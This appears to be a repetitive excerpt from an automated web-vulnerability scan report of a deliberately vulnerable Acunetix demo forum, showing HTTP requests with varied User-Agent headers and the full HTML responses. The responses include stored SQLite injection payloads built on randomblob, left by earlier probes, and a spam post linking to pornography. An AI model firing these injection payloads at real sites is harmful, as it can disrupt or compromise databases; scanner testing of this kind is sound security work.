| Request Header - size: 504 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:47 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:46 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 381 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:46 GMT Content-Length: 8067 |
| Response Body - size: 8,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 381 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:45 GMT Content-Length: 8067 |
| Response Body - size: 8,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 381 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:45 GMT Content-Length: 8067 |
| Response Body - size: 8,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img 